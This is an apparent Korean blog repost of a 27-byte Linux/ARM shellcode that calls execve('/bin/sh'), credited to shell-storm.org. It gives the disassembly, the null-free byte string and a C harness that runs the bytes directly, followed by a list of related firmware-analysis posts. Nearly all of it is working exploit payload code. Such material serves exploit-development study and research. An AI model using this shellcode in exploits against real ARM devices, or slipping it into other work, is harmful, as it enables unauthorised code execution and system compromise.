/* |
Title: Linux/ARM - execve("/bin/sh", [0], [0 vars]) - 27 bytes |
Date: 2010-08-31 |
Tested on: ARM926EJ-S rev 5 (v5l) |
Author: Jonathan Salwan - twitter: @jonathansalwan |
shell-storm.org |
Shellcode ARM with not a 0x20, 0x0a and 0x00 |
Disassembly of section .text: |
00008054 <_start>: |
8054: e28f3001 add r3, pc, #1 ; 0x1 |
8058: e12fff13 bx r3 |
805c: 4678 mov r0, pc |
805e: 3008 adds r0, #8 |
8060: 1a49 subs r1, r1, r1 |
8062: 1a92 subs r2, r2, r2 |
8064: 270b movs r7, #11 |
8066: df01 svc 1 |
8068: 622f str r7, [r5, #32] |
806a: 6e69 ldr r1, [r5, #100] |
806c: 732f strb r7, [r5, #12] |
806e: 0068 lsls r0, r5, #1 |
*/ |
#include <stdio.h> |
char SC[] = "\x01\x30\x8f\xe2" |
"\x13\xff\x2f\xe1" |
"\x78\x46\x08\x30" |
"\x49\x1a\x92\x1a" |
"\x0b\x27\x01\xdf" |
"\x2f\x62\x69\x6e" |
"\x2f\x73\x68"; |
int main(void) |
{ |
fprintf(stdout,"Length: %d\n",strlen(SC)); |
(*(void(*)()) SC)(); |
return 0; |
} |
'ARM & 펌웨어 분석' 카테고리의 다른 글
| CGI 환경 변수 정의 모음 (Group of CGI enviroment) (0) | 2012.11.13 |
|---|---|
| [ 펌 ] How to Create a Shellcode on ARM Architecture (0) | 2012.11.13 |
| ARM core execve("/bin/sh") shellocde (0) | 2012.11.12 |
| qemu for window 에서 포트포워딩 하여 내부에 접속하기 (How to networking in qemu) (0) | 2012.11.12 |
| strchr() 의 사용 법 (0) | 2012.11.07 |
